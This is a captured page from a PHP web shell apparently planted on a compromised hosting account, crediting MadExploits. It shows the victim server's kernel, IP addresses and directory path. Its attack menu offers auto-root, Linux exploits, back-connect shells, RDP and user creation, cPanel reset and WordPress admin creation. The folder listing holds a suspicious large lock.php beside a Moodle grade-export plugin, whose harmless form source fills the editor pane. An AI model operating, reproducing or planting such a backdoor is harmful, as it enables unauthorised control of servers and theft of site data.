Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.127.135
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
grade /
export /
apogee /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
README-fr.md
5.04
KB
-rw-r--r--
README.md
4.06
KB
-rw-r--r--
cloud.php
25.87
KB
-rw-r--r--
dump.php
2.46
KB
-rw-r--r--
example.csv
1.42
KB
-rw-r--r--
export.php
2.61
KB
-rw-r--r--
grade_export_apogee.php
5.98
KB
-rw-r--r--
grade_export_apogee_form.php
6.13
KB
-rw-r--r--
index.php
2.13
KB
-rw-r--r--
lock.php
358.07
KB
-rw-r--r--
settings.php
2.59
KB
-rw-r--r--
version.php
1.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : grade_export_apogee_form.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Form class for the plugin export. * * @package gradeexport_apogee * @author Anthony Durif - Université Clermont Auvergne * @copyright 2019 Anthony Durif - Université Clermont Auvergne * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ require_once("$CFG->libdir/formslib.php"); /** * grade_export_apogee_form class, used to determine which grade item export and for which students. * * @package gradeexport_apogee * @copyright 2019 Anthony Durif - Université Clermont Auvergne * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ class grade_export_apogee_form extends moodleform { /** * Form definition. */ public function definition() { global $CFG, $COURSE; $mform = $this->_form; $mform->addElement('header', 'gradeitems', get_string('gradeitemsinc', 'grades')); $switch = grade_get_setting($COURSE->id, 'aggregationposition', $CFG->grade_aggregationposition); $gseq = new grade_seq($COURSE->id, $switch); if ($gradeitems = $gseq->items) { $default = 0; $canviewhidden = has_capability('moodle/grade:viewhidden', context_course::instance($COURSE->id)); foreach ($gradeitems as $gradeitem) { // Is the grade_item hidden or its deletion pending? If so, can the user see hidden grade_items? $deletionpending = course_module_instance_pending_deletion($COURSE->id, $gradeitem->itemmodule, $gradeitem->iteminstance); if (($gradeitem->is_hidden() && !$canviewhidden) || $deletionpending) { continue; } $radioarray[] =& $mform->createElement('radio', 'item', '', $gradeitem->get_name(), $gradeitem->id); if ($gradeitem->itemtype == "course") { $default = $gradeitem->id; } } $mform->addGroup($radioarray, 'items', '', array('<br/>'), false); $mform->addRule('items', null, 'required', null, 'client'); if ($default != 0) { $mform->setDefault('item', $default); } } $mform->addElement('header', 'source', get_string('source_file', 'gradeexport_apogee')); $link = html_writer::link(new moodle_url('example.csv'), 'example.csv'); $mform->addElement('static', 'examplecsv', get_string('examplecsv', 'gradeexport_apogee'), $link); $mform->addHelpButton('examplecsv', 'examplecsv', 'gradeexport_apogee'); $mform->addElement('filepicker', 'importfile', get_string('select_file', 'gradeexport_apogee'), null, array( 'maxbytes' => 0, 'accepted_types' => array('.csv'), 'trusttext' => false, )); $mform->addHelpButton('importfile', 'select_file', 'gradeexport_apogee', '', null); $mform->addRule('importfile', get_string('select_file_error', 'gradeexport_apogee'), 'required', null, 'client'); $delimiterslist = ['semicolon' => ';', 'comma' => ',', 'tab' => '/t']; $mform->addElement('select', 'delimiter', get_string('delimiter', 'gradeexport_apogee'), $delimiterslist); $mform->addHelpButton('delimiter', 'delimiter', 'gradeexport_apogee'); $mform->setDefault('delimiter', 'semicolon'); // Attendance. $coursecontext = context_course::instance($COURSE->id); $users = []; $auth_plugins = explode(',', get_config('gradeexport_apogee', 'auth_criteria')); foreach (get_enrolled_users($coursecontext, 'moodle/block:view') as $user) { // Check if enrolled user is a student (to be found in Apogee). // We make a pre filter with users with auth methods selected in administration. if (in_array($user->auth, $auth_plugins)) { // Check the pattern of email addresse defined in config to identify students. $pattern = get_config('gradeexport_apogee', 'email_regexp_criteria'); if ($pattern) { if (preg_match($pattern, $user->email)) { // The user email address matches with the pattern => we add the users the selection list. $users[$user->id] = fullname($user); } } else { // There isn't a defined pattern => we add the users the selection list. $users[$user->id] = fullname($user); } } } if ($users) { $mform->addElement('header', 'attendance', get_string('attendance', 'gradeexport_apogee')); $mform->addElement('html', get_string('attendance_desc', 'gradeexport_apogee')); $mform->addElement('searchableselector', 'abj', get_string('attendance_abj', 'gradeexport_apogee'), $users, array('multiple')); $mform->addElement('searchableselector', 'abi', get_string('attendance_abi', 'gradeexport_apogee'), $users, array('multiple')); } $this->add_action_buttons(); } function validation($data, $files) { $errors = parent::validation($data, $files); if (!empty($data['abj']) && !empty($data['abi'])) { $communs = array_intersect($data['abj'], $data['abi']); if (count($communs) > 0) { $errors['abj'] = get_string('attendance_error', 'gradeexport_apogee'); $errors['abi'] = get_string('attendance_error', 'gradeexport_apogee'); } } return $errors; } }
Close